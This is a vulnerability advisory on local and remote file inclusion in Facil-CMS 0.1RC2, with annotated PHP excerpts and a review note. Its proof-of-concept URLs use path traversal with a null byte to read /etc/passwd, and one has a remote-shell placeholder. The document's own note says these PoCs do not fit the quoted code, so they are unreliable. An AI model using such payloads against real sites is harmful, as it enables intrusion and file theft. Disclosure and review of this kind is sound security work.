########################################################
|
|
Facil-CMS (LFI/RFI) Vulnerability
|
|
########################################################
|
|
[+]Title : Facil-CMS Multiple Vulnerabilities
|
|
[+]Version: 0.1RC2
|
|
[+]Download: http://sourceforge.net/projects/facil-cms/files/
|
|
[+]Author: eidelweiss
|
|
[+]Contact: eidelweiss[at]cyberservices[dot]com
|
|
|
|
[!]Thanks To: all friends
|
|
|
|
########################################################
|
|
|
|
-=[ Vuln C0de ]=-
|
|
***********************
|
|
[-]facil-cms/index.php
|
|
|
|
// Excerpt of facil-cms/index.php as quoted by the advisory. Lines appear to be
// elided: the if below has no braces in this excerpt, so as printed it would
// guard only the first require_once that follows it.
require_once('config.inc.php');
|
|
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
|
|
|
|
$config = new facilConfig();
|
|
$utils = new facilUtils();
|
|
|
|
// The module includes are gated by facilUtils::is_module(). Its body is not
// shown, so how strictly it validates the name cannot be judged from here.
if($utils->is_module($config->getSiteIndex()))
|
|
|
|
// The module directory name comes from $config->getSiteIndex() and is
// concatenated straight into the include path.
// NOTE(review): the excerpt does not show where facilConfig gets this value;
// confirm it cannot be influenced by the request. A safer pattern is to match
// the name against the list of installed module directories before including.
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/config.php');
|
|
require_once(_FACIL_MODULES_PATH_ . '/' . $config->getSiteIndex() . '/class/index.php');
|
|
|
|
***********************
|
|
[-]facil-cms/modules.php
|
|
|
|
// Excerpt of facil-cms/modules.php as quoted by the advisory. Closing braces
// and what are presumably else branches are missing, so the control flow
// below is incomplete and has to be read with that in mind.
require_once('config.inc.php');
|
|
require_once(_FACIL_INCLUDES_PATH_ . '/facil-settings.php');
|
|
|
|
// modload is read from the POST body and accepted only when it is non-empty
// and contains no "/". eregi() was deprecated in PHP 5.3 and removed in
// PHP 7.0. A single-character denylist is a weak control; matching the name
// against the installed module directories is the robust check.
if($_POST['modload'] && !eregi("/", $_POST['modload']))
|
|
{
|
|
$_MODLOAD = trim($_POST['modload']);
|
|
// fileload gets the same "/" test as modload.
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
|
|
{
|
|
$FILELOAD = trim($_POST['fileload']);
|
|
|
|
// Presumably the fallback branch (braces and else elided in the excerpt):
// both values are reset to false.
$_MODLOAD = false;
|
|
$FILELOAD = false;
|
|
|
|
// Same pattern for the admin loader parameter.
if($_POST['admload'] && !eregi("/", $_POST['admload']))
|
|
{
|
|
$_ADMLOAD = trim($_POST['admload']);
|
|
if($_POST['fileload'] && !eregi("/", $_POST['fileload']))
|
|
|
|
|
|
// Presumably the fallback branch again (elided in the excerpt).
$_ADMLOAD = false;
|
|
$FILELOAD = false;
|
|
|
|
// $_MODLOAD is concatenated into the include path behind a fixed prefix.
// NOTE(review): whether a value that failed the "/" test can still reach
// these lines depends on the elided branches. Validate the module name
// against an allowlist immediately before the include, not only at input time.
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/config.php');
|
|
require_once(_FACIL_MODULES_PATH_ . '/' . $_MODLOAD . '/class/index.php');
|
|
|
|
*******************
|
|
|
|
[-]facil-cms/includes/facil-settings.php
|
|
|
|
// Excerpt of facil-cms/includes/facil-settings.php as quoted by the advisory.
// When the session has no language yet, it is seeded from the site config.
if(!isset($_SESSION['FACIL_LANGUAGE']))
|
|
{
|
|
$_SESSION['FACIL_LANGUAGE'] = $config->getLanguage();
|
|
}
|
|
|
|
// Both include paths are built from session values with no validation visible
// in this excerpt. Each value sits between a fixed prefix and a fixed suffix.
// NOTE(review): the excerpt does not show where $_SESSION['FACIL_THEME'] is
// assigned or whether a request can set it; confirm against the full file.
// The language and theme names should be checked against the directories
// actually installed before they are used in require_once.
require_once(_FACIL_I18N_PATH_ . '/lang-' . $_SESSION['FACIL_LANGUAGE'] . '.php');
|
|
require_once(_FACIL_THEMES_PATH_ . '/' . $_SESSION['FACIL_THEME'] . '/themeFacil.class.php');
|
|
|
|
*******************
|
|
|
|
-=[ Proof Of Concept ]=-
|
|
|
|
http://127.0.0.1/facil-cms/modules.php?modload=../../../../../../../../etc/passwd%00
|
|
Similar reference:
|
|
http://www.exploit-db.com/exploits/5792
|
|
|
|
http://127.0.0.1/facil-cms/index.php?getSiteIndex=../../../../../../../../etc/passwd%00
|
|
|
|
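http://127.0.0.1/facil-cms//includes/facil-settings.php?FACIL_THEME= [rfi shell]

[!]Note: these URLs pass values in the query string, whereas the quoted modules.php reads modload from $_POST and rejects any value containing "/". getSiteIndex and FACIL_THEME appear in the quoted code as a config method and a session key, not as request parameters. Whether such requests reach the require_once calls therefore depends on code and PHP settings not shown here (presumably register_globals for the session value). In both facil-settings.php includes the value follows a fixed path prefix, so the excerpt supports local file inclusion at most, not remote inclusion. The trailing %00 relies on NUL-byte path truncation, which PHP 5.3.4 and later reject. Mitigation: resolve module, language and theme names against a fixed list of installed directories before building the include path.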
|
|
|
|
######################################################## |